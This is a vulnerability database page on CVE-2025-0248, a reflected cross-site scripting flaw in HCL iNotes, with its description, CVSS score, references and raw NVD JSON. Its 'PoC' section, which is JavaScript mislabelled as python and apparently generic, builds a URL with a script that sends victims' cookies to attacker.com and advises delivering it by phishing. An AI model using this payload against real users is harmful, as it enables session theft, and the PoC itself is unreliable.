CVE-2025-0248

Description

HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

HCL iNotes versions prior to latest update

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-0248 PoC - Reflected XSS in HCL iNotes
// Target: HCL iNotes
// Attack Vector: Malicious URL with XSS payload in parameter

const https = require('https');

// XSS payload - steals session cookie
const xssPayload = '<script>fetch("https://attacker.com/log?cookie="+document.cookie)</script>';

// Encode the payload for URL
const encodedPayload = encodeURIComponent(xssPayload);

// Target URL - replace with actual vulnerable endpoint
const targetHost = 'vulnerable-server.example.com';
const targetPath = '/iNotes/PrtFwd.nsf'; // Example vulnerable path

// Construct malicious URL
const maliciousUrl = `https://${targetHost}${targetPath}?param=${encodedPayload}`;

console.log('[+] CVE-2025-0248 Reflected XSS PoC');
console.log('[+] Target:', targetHost);
console.log('[+] Malicious URL:');
console.log(maliciousUrl);
console.log('\n[+] Send this URL to victim via phishing email');
console.log('[+] When victim clicks, their cookies will be exfiltrated');

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-0248
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-0248
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-0248/
[4] VulDB https://vuldb.com/cve/CVE-2025-0248
[5] https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-0248", "sourceIdentifier": "[email protected]", "published": "2025-11-25T16:16:06.137", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL iNotes is susceptible to a Reflected Cross-site Scripting (XSS) vulnerability caused by improper validation of user-supplied input. A remote, unauthenticated attacker can specially craft a URL to execute script in a victim's Web browser within the security context of the hosting Web site and/or steal the victim's cookie-based authentication credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127032", "source": "[email protected]"}]}}